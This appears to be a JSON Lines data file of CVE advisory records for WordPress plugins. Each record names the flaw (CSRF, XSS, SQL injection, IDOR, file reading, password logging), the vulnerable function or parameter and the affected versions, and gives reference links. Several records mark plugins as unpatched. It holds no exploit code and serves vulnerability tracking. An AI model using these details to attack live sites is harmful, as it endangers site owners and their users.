{"CVE_ID":"CVE-2024-1214","slug":"easy-facebook-likebox","versionImpact":"6.5.4","description":"The Easy Social Feed \u2013 Social Photos Gallery \u2013 Post Feed \u2013 Like Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.4. This is due to missing or incorrect nonce validation on the save_groups_list function. This makes it possible for unauthenticated attackers to disconnect a site's facebook or instagram page\/group connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aaf62045-b9ce-40d7-92b3-7ab683e5a08c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aaf62045-b9ce-40d7-92b3-7ab683e5a08c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-facebook-likebox\\\/trunk\\\/facebook\\\/admin\\\/class-easy-facebook-likebox-admin.php?rev=3047064\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-facebook-likebox\\\/trunk\\\/facebook\\\/admin\\\/class-easy-facebook-likebox-admin.php?rev=3047064\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5229","slug":"primary-addon-for-elementor","versionImpact":"1.5.5","description":"The Primary Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table widget in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ea95b5-9e1c-41b1-9bc5-5fd5cecef65d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ea95b5-9e1c-41b1-9bc5-5fd5cecef65d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/primary-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-pricing-table.php#L775\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/primary-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-pricing-table.php#L775\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092073\\\/primary-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-pricing-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092073\\\/primary-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-pricing-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092073\\\/#file366\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092073\\\/#file366\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/primary-addon-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/primary-addon-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7651","slug":"app-builder","versionImpact":"4.2.6","description":"The App Builder \u2013 Create Native Android & iOS Apps On The Flight plugin for WordPress is vulnerable to limited SQL Injection via the \u2018app-builder-search\u2019 parameter in all versions up to, and including, 4.2.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b43371a6-bcb5-4418-b5a5-85879775010c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b43371a6-bcb5-4418-b5a5-85879775010c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/trunk\\\/includes\\\/pure.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/app-builder\\\/trunk\\\/includes\\\/pure.php#L18\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8043","slug":"vikinghammer-tweet","versionImpact":"0.2.4","description":"The Vikinghammer Tweet WordPress plugin through 0.2.4 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ba27715-add4-4e2c-ad0d-83ebdc26aec1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ba27715-add4-4e2c-ad0d-83ebdc26aec1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9586","slug":"linkz-ai","versionImpact":"1.1.8","description":"The Linkz.ai plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'check_auth' and 'check_logout' functions in versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to update plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4b4ca5b-c806-4b68-acb8-6b63d6ca5728?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4b4ca5b-c806-4b68-acb8-6b63d6ca5728?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L142\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkz-ai\\\/tags\\\/1.1.8\\\/init.php#L159\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5816","slug":"code-explorer","versionImpact":"1.4.5","description":"The Code Explorer plugin for WordPress is vulnerable to arbitrary external file reading in all versions up to, and including, 1.4.5. This is due to the fact that the plugin does not restrict accessing files to those outside of the WordPress instance, though the intention of the plugin is to only access WordPress related files. This makes it possible for authenticated attackers, with administrator-level access, to read files outside of the WordPress instance.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42ecc4e5-d660-472f-823d-a29b84cdf041?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42ecc4e5-d660-472f-823d-a29b84cdf041?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/code-explorer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/code-explorer\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51807","slug":"agendapress","versionImpact":"1.0.8","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Black and White Digital Ltd AgendaPress \u2013 Easily Publish Meeting Agendas and Programs on WordPress allows Stored XSS.This issue affects AgendaPress \u2013 Easily Publish Meeting Agendas and Programs on WordPress: from n\/a through 1.0.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/agendapress\\\/wordpress-agendapress-plugin-1-0-8-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/agendapress\\\/wordpress-agendapress-plugin-1-0-8-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13499","slug":"gamipress","versionImpact":"7.2.1","description":"The The GamiPress \u2013 Gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via gamipress_do_shortcode() function in all versions up to, and including, 7.2.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/functions.php#L645\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/functions.php#L645\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b30ab159-ff3c-4d46-b182-f8938097b837?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b30ab159-ff3c-4d46-b182-f8938097b837?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13326","slug":"ibuildapp","versionImpact":"0.2.0","description":"The iBuildApp WordPress plugin through 0.2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc1f755e-63f2-4f5d-a50e-9e2c589e6e4f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc1f755e-63f2-4f5d-a50e-9e2c589e6e4f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13855","slug":"prime-addons-for-elementor","versionImpact":"2.0.1","description":"The Prime Addons for Elementor plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.1 via the pae_global_block shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract information from posts that are not public, including drafts, private, password protected, and restricted posts. This applies to posts created with Elementor only.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/prime-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/prime-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac5012f2-3518-41c0-befe-597008f22152?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac5012f2-3518-41c0-befe-597008f22152?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13823","slug":"360-product-rotation","versionImpact":"1.5.8","description":"The 360 Product Rotation WordPress plugin through 1.5.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcfd8a03-0a04-4fd1-986d-1e816b1fad19\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dcfd8a03-0a04-4fd1-986d-1e816b1fad19\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-28948","slug":"mediabay","versionImpact":"1.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in codedraft Mediabay - WordPress Media Library Folders allows Reflected XSS. This issue affects Mediabay - WordPress Media Library Folders: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mediabay\\\/vulnerability\\\/wordpress-mediabay-wordpress-media-library-folders-plugin-1-4-csrf-to-reflected-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mediabay\\\/vulnerability\\\/wordpress-mediabay-wordpress-media-library-folders-plugin-1-4-csrf-to-reflected-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8621","slug":"mosaic-generator","versionImpact":"1.0.5","description":"The Mosaic Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018c\u2019 parameter in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mosaic-generator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mosaic-generator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91c87d34-ef9a-42f4-b11a-7c5a5c842550?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91c87d34-ef9a-42f4-b11a-7c5a5c842550?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3126","slug":"b2bking-wholesale-for-woocommerce","versionImpact":"4.6.00","description":"The B2BKing plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'b2bkingdownloadpricelist' function in versions up to, and including, 4.6.00. This makes it possible for Authenticated attackers with subscriber or customer-level permissions to retrieve the full pricing list of all products on the site.","refs":"[{\"url\":\"https:\\\/\\\/woocommerce-b2b-plugin.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/woocommerce-b2b-plugin.com\\\/changelog\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-b2bking-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-b2bking-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2e3ac14-1421-49f0-9c60-7f7d5c9d7654?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2e3ac14-1421-49f0-9c60-7f7d5c9d7654?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1769","slug":"jm-twitter-cards","versionImpact":"12","description":"The JM Twitter Cards plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 12 via the meta description data. This makes it possible for unauthenticated attackers to view password protected post content when viewing the page source.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b48e5973-6923-47cc-a660-ecc989f540f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b48e5973-6923-47cc-a660-ecc989f540f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jm-twitter-cards\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jm-twitter-cards\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1213","slug":"easy-facebook-likebox","versionImpact":"6.5.4","description":"The Easy Social Feed \u2013 Social Photos Gallery \u2013 Post Feed \u2013 Like Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.4. This is due to missing or incorrect nonce validation on the esf_insta_save_access_token and efbl_save_facebook_access_token functions. This makes it possible for unauthenticated attackers to connect their facebook and instagram pages to the site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/262dcea7-3ac4-43ee-90d7-91f200c3496c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/262dcea7-3ac4-43ee-90d7-91f200c3496c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047064%40easy-facebook-likebox&new=3047064%40easy-facebook-likebox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047064%40easy-facebook-likebox&new=3047064%40easy-facebook-likebox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7647","slug":"ota-sync-booking-engine-widget","versionImpact":"1.2.7","description":"The OTA Sync Booking Engine Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.7. This is due to missing or incorrect nonce validation on the otasync_widget_settings_fnc() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9af6d311-a72e-4c86-8ecb-70fa83e5a240?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9af6d311-a72e-4c86-8ecb-70fa83e5a240?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ota-sync-booking-engine-widget\\\/trunk\\\/otasync-widget.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ota-sync-booking-engine-widget\\\/trunk\\\/otasync-widget.php#L72\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5170","slug":"logo-manager-for-enamad","versionImpact":"0.7.1","description":"The Logo Manager For Enamad WordPress plugin through 0.7.1 does not sanitise and escape in its widgets settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/37b5ed06-0633-49e0-b47d-8aa2f4510179\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/37b5ed06-0633-49e0-b47d-8aa2f4510179\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9990","slug":"crypto","versionImpact":"2.15","description":"The Crypto plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.15. This is due to missing nonce validation in the 'crypto_connect_ajax_process::check' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cea39157-94aa-4982-983e-9c3e4b1af86d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cea39157-94aa-4982-983e-9c3e4b1af86d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L65\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51634","slug":"webriti-custom-login-page","versionImpact":"0.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in Webriti WordPress Themes & Plugins Shop Webriti Custom Login allows Reflected XSS.This issue affects Webriti Custom Login: from n\/a through 0.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/webriti-custom-login-page\\\/wordpress-webriti-custom-login-plugin-0-3-csrf-to-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/webriti-custom-login-page\\\/wordpress-webriti-custom-login-plugin-0-3-csrf-to-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13496","slug":"gamipress","versionImpact":"7.2.1","description":"The GamiPress \u2013 Gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 7.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/ajax-functions.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/includes\\\/ajax-functions.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/libraries\\\/ct\\\/includes\\\/class-ct-query.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/trunk\\\/libraries\\\/ct\\\/includes\\\/class-ct-query.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226227\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea54436c-b623-4049-af19-9995c312476e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea54436c-b623-4049-af19-9995c312476e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13325","slug":"glossy","versionImpact":"2.3.5","description":"The Glossy WordPress plugin through 2.3.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49bddf87-c578-47b7-a8fb-4dc550bbaa47\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/49bddf87-c578-47b7-a8fb-4dc550bbaa47\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13849","slug":"cookie-notice-bar","versionImpact":"1.3.0","description":"The Cookie Notice Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cookie-notice-bar\\\/tags\\\/1.3.0\\\/admin\\\/partials\\\/dc-cookie-notice-bar-admin-display.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cookie-notice-bar\\\/tags\\\/1.3.0\\\/admin\\\/partials\\\/dc-cookie-notice-bar-admin-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cookie-notice-bar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cookie-notice-bar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24bdffdc-1a4d-4a1c-8393-cf89f0a63bf9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24bdffdc-1a4d-4a1c-8393-cf89f0a63bf9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22644","slug":"vayu-blocks","versionImpact":"1.2.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeHunk Vayu Blocks \u2013 Gutenberg Blocks for WordPress & WooCommerce allows Stored XSS.This issue affects Vayu Blocks \u2013 Gutenberg Blocks for WordPress & WooCommerce: from n\/a through 1.2.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/vayu-blocks\\\/vulnerability\\\/wordpress-vayu-blocks-gutenberg-blocks-plugin-1-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/vayu-blocks\\\/vulnerability\\\/wordpress-vayu-blocks-gutenberg-blocks-plugin-1-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5760","slug":"simple-history","description":"The Simple History plugin for WordPress is vulnerable to sensitive data exposure via Detective Mode due to improper sanitization within the append_debug_info_to_context() function in versions prior to 5.8.1. When Detective Mode is enabled, the plugin\u2019s logger captures the entire contents of $_POST (and sometimes raw request bodies or $_GET) without redacting any password-related keys. As a result, whenever a user submits a login form, whether via native wp_login or a third-party login widget, their actual password is written in clear text into the logs. An authenticated attacker or any user whose actions generate a login event will have their password recorded; an administrator (or anyone with database read access) can then read those logs and retrieve every captured 